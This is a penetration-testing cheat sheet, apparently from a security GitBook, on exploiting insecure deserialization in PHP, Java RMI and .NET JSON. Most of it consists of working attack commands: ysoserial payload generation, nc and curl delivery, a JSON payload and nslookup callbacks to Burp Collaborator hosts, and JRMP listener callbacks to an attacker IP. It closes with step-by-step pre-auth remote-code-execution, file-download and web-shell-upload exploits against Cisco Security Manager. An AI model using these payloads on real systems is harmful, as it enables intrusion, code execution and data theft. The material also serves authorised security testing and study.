# (De)Serialization

## PHPggc

Vulnerable block of code:

```php
<?php
$data = unserialize($_GET['data']);
print $data['message'];
```

{% embed url="<https://github.com/ambionics/phpggc>" %}

```
$ ./phpggc -l

Gadget Chains
-------------

NAME                                      VERSION                         TYPE                   VECTOR         I    
CodeIgniter4/RCE1                         4.0.0-beta.1 <= 4.0.0-rc.4      RCE (Function call)    __destruct          
CodeIgniter4/RCE2                         4.0.0-rc.4 <= 4.0.4+            RCE (Function call)    __destruct          
Doctrine/FW1                              ?                               File write             __toString     *    
Drupal7/FD1                               7.0 < ?                         File delete            __destruct     *    
Drupal7/RCE1                              7.0.8 < ?                       RCE (Function call)    __destruct     *    
Guzzle/FW1                                6.0.0 <= 6.3.3+                 File write             __destruct          
Guzzle/INFO1                              6.0.0 <= 6.3.2                  phpinfo()              __destruct     *    
Guzzle/RCE1                               6.0.0 <= 6.3.2                  RCE (Function call)    __destruct     *    
Horde/RCE1                                <= 5.2.22                       RCE (PHP code)         __destruct     *    
Laminas/FD1                               <= 2.11.2                       File delete            __destruct          
Laravel/RCE1                              5.4.27                          RCE (Function call)    __destruct          
Laravel/RCE2                              5.5.39                          RCE (Function call)    __destruct          
Laravel/RCE3                              5.5.39                          RCE (Function call)    __destruct     *    
Laravel/RCE4                              5.5.39                          RCE (Function call)    __destruct          
Laravel/RCE5                              5.8.30                          RCE (PHP code)         __destruct     *    
Laravel/RCE6                              5.5.*                           RCE (PHP code)         __destruct     *    
Laravel/RCE7                              ? <= 8.16.1                     RCE (Function call)    __destruct     *    
Magento/FW1                               ? <= 1.9.4.0                    File write             __destruct     *    
Magento/SQLI1                             ? <= 1.9.4.0                    SQL injection          __destruct          
Monolog/RCE1                              1.18 <= 2.1.1+                  RCE (Function call)    __destruct          
Monolog/RCE2                              1.5 <= 2.1.1+                   RCE (Function call)    __destruct          
Monolog/RCE3                              1.1.0 <= 1.10.0                 RCE (Function call)    __destruct          
Monolog/RCE4                              ? <= 2.4.4+                     RCE (Command)          __destruct     *    
Phalcon/RCE1                              <= 1.2.2                        RCE                    __wakeup       *    
PHPCSFixer/FD1                            <= 2.17.3                       File delete            __destruct          
PHPCSFixer/FD2                            <= 2.17.3                       File delete            __destruct          
PHPExcel/FD1                              1.8.2+                          File delete            __destruct          
PHPExcel/FD2                              <= 1.8.1                        File delete            __destruct          
PHPExcel/FD3                              1.8.2+                          File delete            __destruct          
PHPExcel/FD4                              <= 1.8.1                        File delete            __destruct          
Pydio/Guzzle/RCE1                         < 8.2.2                         RCE (Function call)    __toString          
Slim/RCE1                                 3.8.1                           RCE (Function call)    __toString          
Smarty/FD1                                ?                               File delete            __destruct          
Smarty/SSRF1                              ?                               SSRF                   __destruct     *    
SwiftMailer/FD1                           -5.4.12+, -6.2.1+               File delete            __destruct          
SwiftMailer/FW1                           5.1.0 <= 5.4.8                  File write             __toString          
SwiftMailer/FW2                           6.0.0 <= 6.0.1                  File write             __toString          
SwiftMailer/FW3                           5.0.1                           File write             __toString          
SwiftMailer/FW4                           4.0.0 <= ?                      File write             __destruct          
Symfony/FW1                               2.5.2                           File write             DebugImport    *    
Symfony/FW2                               3.4                             File write             __destruct          
Symfony/RCE1                              3.3                             RCE (Command)          __destruct     *    
Symfony/RCE2                              2.3.42 < 2.6                    RCE (PHP code)         __destruct     *    
Symfony/RCE3                              2.6 <= 2.8.32                   RCE (PHP code)         __destruct     *    
Symfony/RCE4                              3.4.0-34, 4.2.0-11, 4.3.0-7     RCE (Function call)    __destruct     *    
Symfony/RCE5                              5.2.*                           RCE (Function call)    __destruct
TCPDF/FD1                                 <= 6.3.5                        File delete            __destruct     *    
ThinkPHP/RCE1                             5.1.x-5.2.x                     RCE (Function call)    __destruct     *    
WordPress/Dompdf/RCE1                     0.8.5+ & WP < 5.5.2             RCE (Function call)    __destruct     *    
WordPress/Dompdf/RCE2                     0.7.0 <= 0.8.4 & WP < 5.5.2     RCE (Function call)    __destruct     *    
WordPress/Guzzle/RCE1                     4.0.0 <= 6.4.1+ & WP < 5.5.2    RCE (Function call)    __toString     *    
WordPress/Guzzle/RCE2                     4.0.0 <= 6.4.1+ & WP < 5.5.2    RCE (Function call)    __destruct     *    
WordPress/P/EmailSubscribers/RCE1         4.0 <= 4.4.7+ & WP < 5.5.2      RCE (Function call)    __destruct     *    
WordPress/P/EverestForms/RCE1             1.0 <= 1.6.7+ & WP < 5.5.2      RCE (Function call)    __destruct     *    
WordPress/P/WooCommerce/RCE1              3.4.0 <= 4.1.0+ & WP < 5.5.2    RCE (Function call)    __destruct     *    
WordPress/P/WooCommerce/RCE2              <= 3.4.0 & WP < 5.5.2           RCE (Function call)    __destruct     *    
WordPress/P/YetAnotherStarsRating/RCE1    ? <= 1.8.6 & WP < 5.5.2         RCE (Function call)    __destruct     *    
WordPress/PHPExcel/RCE1                   1.8.2+ & WP < 5.5.2             RCE (Function call)    __toString     *    
WordPress/PHPExcel/RCE2                   <= 1.8.1 & WP < 5.5.2           RCE (Function call)    __toString     *    
WordPress/PHPExcel/RCE3                   1.8.2+ & WP < 5.5.2             RCE (Function call)    __destruct     *    
WordPress/PHPExcel/RCE4                   <= 1.8.1 & WP < 5.5.2           RCE (Function call)    __destruct     *    
WordPress/PHPExcel/RCE5                   1.8.2+ & WP < 5.5.2             RCE (Function call)    __destruct     *    
WordPress/PHPExcel/RCE6                   <= 1.8.1 & WP < 5.5.2           RCE (Function call)    __destruct     *    
Yii/RCE1                                  1.1.20                          RCE (Function call)    __wakeup       *    
Yii2/RCE1                                 <2.0.38                         RCE (Function call)    __destruct     *    
Yii2/RCE2                                 <2.0.38                         RCE (PHP code)         __destruct     *    
ZendFramework/FD1                         ? <= 1.12.20                    File delete            __destruct          
ZendFramework/RCE1                        ? <= 1.12.20                    RCE (PHP code)         __destruct     *    
ZendFramework/RCE2                        1.11.12 <= 1.12.20              RCE (Function call)    __toString     *    
ZendFramework/RCE3                        2.0.1 <= ?                      RCE (Function call)    __destruct          
ZendFramework/RCE4                        ? <= 1.12.20                    RCE (PHP code)         __destruct     *
```

{% embed url="<https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Insecure%20Deserialization/PHP.md>" %}

{% embed url="<https://medium.com/swlh/exploiting-php-deserialization-56d71f03282a>" %}

{% embed url="<https://owasp.org/www-community/vulnerabilities/PHP_Object_Injection>" %}

{% embed url="<https://notsosecure.com/remote-code-execution-via-php-unserialize/>" %}

{% embed url="<https://insomniasec.com/cdn-assets/Practical_PHP_Object_Injection.pdf>" %}

## Nmap rmi script

```
nmap --script rmi* 
```

## JSON

```
{"__type":"a"}
{"__type1":"a"}
{"__type":"System.Xml.XmlDocument, System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089", "InnerXml":"<!DOCTYPE stuff SYSTEM 'http://gqaxjsf76ajzgrxlvj9chh21ksqje8.burpcollaborator.net'><stuff>here</stuff>"}
```

## ysoserial gadgets

```
https://github.com/frohoff/ysoserial

$ java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd
0000000: aced 0005 7372 0032 7375 6e2e 7265 666c  ....sr.2sun.refl
0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41  ect.annotation.A
0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174  nnotationInvocat
...
0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76  vr..java.lang.Ov
0000560: 6572 7269 6465 0000 0000 0000 0000 0000  erride..........
0000570: 0078 7071 007e 003a                      .xpq.~.:

$ java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
$ nc 10.10.10.10 1099 < groovypayload.bin

$ java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe

```

## **RMIscout**

```
https://github.com/BishopFox/rmiscout

./rmiscout.sh wordlist -i lists/prototypes.txt localhost 11099
java -jar rmiscout.jar wordlist -h

examples:
# Perform wordlist-attack against remote RMI service using wordlist of function prototypes
./rmiscout.sh wordlist -i lists/prototypes.txt <host> <port>

# Bruteforce using method wordlist and other options
./rmiscout.sh bruteforce -i lists/methods.txt -r void,boolean,long -p String,int -l 1,4 <host> <port>

# Swap object-derived types with the specified ysoserial payload and payload parameter
./rmiscout.sh exploit -s 'void vulnSignature(java.lang.String a, int b)' -p ysoserial.payloads.URLDNS -c "http://examplesubdomain.burpcollaborator.net" -n registryName <host> <port>

# Use GadgetProbe and a known signature to bruteforce classes on the remote classpath
./rmiscout.sh probe -s 'void vulnSignature(java.lang.String a, int b)' -i ../GadgetProbe/wordlists/maven_popular.list -d "examplesubdomain.burpcollaborator.net" -n registryName <host> <port>

java -jar rmiscout-1.03-SNAPSHOT-all.jar wordlist -i lists/prototypes.txt 10.27.4.12 9050 --activation-server
java -jar rmiscout-1.03-SNAPSHOT-all.jar bruteforce -i lists/methods.txt -r void,String -p String,Object -l 1,2 10.27.4.12 9050 --activation-server
java -jar rmiscout-1.03-SNAPSHOT-all.jar exploit -s 'String echoString(String x)' -p ysoserial.payloads.Groovy1 -c "nslookup aiwjstf21seieezd11yr6ymgl7rzfo.burpcollaborator.net" -n RMIInterface 10.27.4.12 9050 --activation-server
java -jar rmiscout-1.03-SNAPSHOT-all.jar probe -s 'String echo(java.lang.Object qwewqe)' -i maven_popular.list -d "nslookup aiwjstf21seieezd11yr6ymgl7rzfo.burpcollaborator.net" -n RMIInterface 10.27.4.12 9050

maven_popular.list:
https://raw.githubusercontent.com/BishopFox/GadgetProbe/master/wordlists/maven_popular.list
```

{% embed url="<https://itnext.io/java-rmi-for-pentesters-part-two-reconnaissance-attack-against-non-jmx-registries-187a6561314d>" %}

{% embed url="<https://mogwailabs.de/en/blog/2019/03/attacking-java-rmi-services-after-jep-290/>" %}

## Deserialization  CISCO devices

> Cisco Security Manager is an enterprise-class security management application that provides insight into and control of Cisco security and network devices. Cisco Security Manager offers comprehensive security management (configuration and event management) across a wide range of Cisco security appliances, including Cisco ASA Adaptive Security Appliances, Cisco IPS Series Sensor Appliances, Cisco Integrated Services Routers (ISRs), Cisco Firewall Services Modules (FWSMs), Cisco Catalyst, Cisco Switches and many more. Cisco Security Manager allows you to manage networks of all sizes efficiently-from small networks to large networks consisting of hundreds of devices.

Several **pre-auth vulnerabilities** were submitted to Cisco on 2020-07-13 and (according to Cisco) **patched in version 4.22** on 2020-11-10. Release notes didn't state anything about the vulnerabilities, security advisories were not published. All payload are processed in the context of **NT AUTHORITY\SYSTEM**.

Requirement: Download *commons-beanutils-1.6.1.jar* from central maven repository.

### Remote Code Execution SecretService.jsp :-)

`java -cp ./commons-beanutils-1.6.1.jar:[YOUR_PATH]]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.GeneratePayload CommonsBeanutils1 "cmd.exe /c calc.exe" > payload_CommonsBeanutils`

`curl -k --request POST --data-binary "@payload_CommonsBeanutils" https://[TARGET_HOST]/CSCOnm/servlet/SecretService.jsp`

### Remote Code Execution CsJaasServiceServlet

Compile JaasEncryptor.java and replace the *b64Payload* content:

```
import java.security.InvalidKeyException;
import java.util.Base64;
import com.cisco.nm.cmf.security.jaas.BlobCrypt;

public class JaasEncryptor {

	public static void main(String args[]) {
		String b64Payload = "rO0ABXN9AAAAAQAaamF2YS5ybWkucmVnaXN0cnkuUmVnaXN0cnl4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcgAtamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdEludm9jYXRpb25IYW5kbGVyAAAAAAAAAAICAAB4cgAcamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdNNhtJEMYTMeAwAAeHB3MQAKVW5pY2FzdFJlZgAIMTAuMC4wLjIAAAG7AAAAAEBnvkQAAAAAAAAAAAAAAAAAAAB4";

		byte[] payload = Base64.getDecoder().decode(b64Payload);
		byte[] key = new byte[]{-100, 76, -23, 87, 125, 0, 5, 94, 12, 76, 37, -84, 36, 78, 123, 5};
		
		byte[] enc = BlobCrypt.encryptArray(payload, key);
		System.out.println("Encrypted payload: " + Base64.getEncoder().encodeToString(enc));
		byte[] dec = BlobCrypt.decryptArray(enc, key);
	}
}
```

Prepare JRMP Listener:

`java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 443`

`java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]]:443' | base64 -w0`

Compile encrypted payload:

`javac -cp [YOUR_PATH]]/server_jars_classes/jars.jar:./ JaasEncryptor2.java; java -cp [YOUR_PATH]/server_jars_classes/jars.jar:./ JaasEncryptor`

Send payload to Servlet with parameters *cmd=data* + new line + *data=\[ENCRYPTED\_PAYLOAD]*.

### Remote Code Execution AuthTokenServlet

Prepare JRMP Listener:

`java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1337 CommonsBeanutils1 "cmd.exe /c calc.exe"`

`java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]]:1337' > payload_JRMP1_2`

Send request:

`curl -k --request POST --data-binary "@payload_JRMP1_2" https://[TARGET_IP]/CSCOnm/servlet/com.cisco.nm.cmf.servlet.AuthTokenServlet`

### Remote Code Execution ClientServicesServlet

Prepare JRMP listener:

`java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1337 CommonsBeanutils1 "cmd.exe /c calc.exe"`

`java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]:1337' > payload_JRMP1_3`

Send request:

`curl -k --request POST --data-binary "@payload_JRMP1_3" https://[TARGET_IP]/CSCOnm/servlet/com.cisco.nm.cmf.servlet.ClientServicesServlet`

### Remote Code Execution CTMServlet

`java -cp ./commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.GeneratePayload CommonsBeanutils1 "cmd.exe /c calc.exe" > payload_CommonsBeanutils1_2`

`curl -i -s -k -X $'POST' -H $'Content-Type: application/octet-stream' -H $'CTM-URN: com-cisco-nm-vms-ipintel-IpIntelligenceApi' -H $'CTM-VERSION: 1.5' -H $'CTM-PRODUCT-ID: /C:/Program Files (x86)/CSCOpx/MDC/tomcat/vms/athena/WEB-INF/lib/' -H $'Cache-Control: no-cache' -H $'Pragma: no-cache' -H $'User-Agent: Java/1.8.0_222' -H $'Host: [TARGET_IP]' -H $'Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2' -H $'Connection: keep-alive' --data-binary "@payload_CommonsBeanutils1_2" $'https://[TARGET_IP]/athena/CTMServlet'`

### Arbitrary File Download XdmConfigRequestHandler

`GET /athena/xdmProxy/xdmConfig[RELATIVE_PATH_TO_FILE]`

### Arbitrary File Download XdmResourceRequestHandler

`GET /athena/xdmProxy/xdmResources[RELATIVE_PATH_TO_FILE]?dmTargetType=TARGET.IDS&dmOsVersion=7.&command=editConfigDelta`

### Arbitrary File Upload XmpFileUploadServlet

Write a web shell e.g.

`POST /cwhp/XmpFileUploadServlet?maxFileSize=100`

Normal multi-part e.g. writing web shell in *filename* with *../../MDC/tomcat/webapps/cwhp/testme.jsp*.

### Arbitrary File Download XmpFileDownloadServlet

`GET /cwhp/XmpFileDownloadServlet?parameterName=downloadDoc&downloadDirectory=[RELATIVE_PATH_TO_DIRECTORY]&readmeText=1`

This will respond with a ZIP file containing all files from the directory.

### Arbitrary File Download SampleFileDownloadServlet

`GET /cwhp/SampleFileDownloadServlet?downloadZipFileName=pwned&downloadFiles=README&downloadLocation=[RELATIVE_PATH_TO_DIRECTORY]`

This will respond with a ZIP file containing all files from the directory.

### Arbitrary File Download resultsFrame.jsp

`GET /athena/itf/resultsFrame.jsp?filename=[RELATIVE_PATH_TO_FILE]`

### Remote Code Execution SecretServiceServlet

See also <https://de.tenable.com/security/research/tra-2017-23>

`java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1337 CommonsBeanutils1 "cmd.exe /c calc.exe"`

`java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]:1337' > payload_JRMP1_2`

`curl -k --request POST --data-binary "@payload_JRMP1_2" https://[TARGET_IP]/CSCOnm/servlet/com.cisco.nm.cmf.servlet.SecretServiceServlet`

**Reference**: <https://gist.github.com/Frycos/8bf5c125d720b3504b4f28a1126e509e>

## Tools

{% content-ref url="../../tools/infrastructure-and-network/de-serialization" %}
[de-serialization](https://gitbook.seguranca-informatica.pt/tools/infrastructure-and-network/de-serialization)
{% endcontent-ref %}